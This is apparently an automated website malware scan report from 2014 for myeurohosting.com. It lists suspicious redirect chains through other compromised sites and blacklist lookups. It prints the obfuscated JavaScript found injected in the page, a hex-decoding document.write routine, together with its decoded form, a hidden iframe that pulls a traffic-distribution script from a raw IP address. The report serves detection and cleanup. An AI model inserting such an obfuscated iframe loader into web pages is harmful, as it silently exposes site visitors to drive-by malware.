Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://myeurohosting.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: myeurohosting.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Wed, 17 Sep 2014 19:26:28 GMT Location: http://art-about-face.com/img/icons/tabs/kee.php Server: Apache Content-Length: 232 Content-Type: text/html; charset=iso-8859-1 | malicious |
URL: http://art-about-face.com/img/icons/tabs/kee.php (imitation of visitor from search engine) GET /img/icons/tabs/kee.php HTTP/1.1 Host: art-about-face.com Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Moved Temporarily Date: Wed, 17 Sep 2014 18:33:16 GMT Location: http://fixmydebts.co.uk/images2/_notes/uni.php Server: Microsoft-IIS/7.0 Content-Length: 169 Content-Type: text/html; charset=UTF-8,text/html X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin | suspicious |
Scanned pages/files
Request | Server response | Status |
http://myeurohosting.com/ | 200 OK Content-Length: 730 Content-Type: application/x-httpd-php | malicious |
Malicious code - confirmed by antiviruses (see below) function v5147b4367e2f8(v5147b4367e346){ function v5147b4367e398 () {var v5147b4367e3e5=16; return v5147b4367e3e5;} return(parseInt(v5147b4367e346,v5147b4367e398()));}function v5147b4367e455(v5147b4367e498){ var v5147b4367e4d9='';for(v5147b4367e53b=0; v5147b4367e53b<v5147b4367e498.length; v5147b4367e53b+=2){ v5147b4367e4d9+=(String.fromCharCode(v5147b4367e2f8(v5147b4367e498.substr(v5147b4367e53b, 2))));}return v5147b4367e4d9;} document.write(v5147b4367e455('3C696672616D65206E616D653D276627207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D333031206865696768743D3639207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='f' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=301 height=69 style='display:none'></iframe> Antivirus reports:
| ||
http://myeurohosting.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Wed, 17 Sep 2014 19:26:28 GMT Location: http://art-about-face.com/img/icons/tabs/kee.php Server: Apache Content-Length: 232 Content-Type: text/html; charset=iso-8859-1 | clean |
http://art-about-face.com/img/icons/tabs/kee.php | HTTP/1.1 302 Moved Temporarily Date: Wed, 17 Sep 2014 18:33:16 GMT Location: http://positivedrivingschool.co.uk/JDD/files/uni.php Server: Microsoft-IIS/7.0 Content-Length: 175 Content-Type: text/html; charset=UTF-8,text/html X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin | clean |
http://positivedrivingschool.co.uk/jdd/files/uni.php | 302 Moved Temporarily Content-Length: 0 Content-Type: text/html | clean |
http://positivedrivingschool.co.uk/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=myeurohosting.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://myeurohosting.com/
Result: myeurohosting.com is not infected or malware details are not published yet.
Result: myeurohosting.com is not infected or malware details are not published yet.